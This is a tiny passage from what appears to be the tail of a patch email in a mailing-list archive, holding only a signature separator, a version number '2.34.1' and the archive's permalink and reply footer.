-- 
2.34.1


^ permalink raw reply related

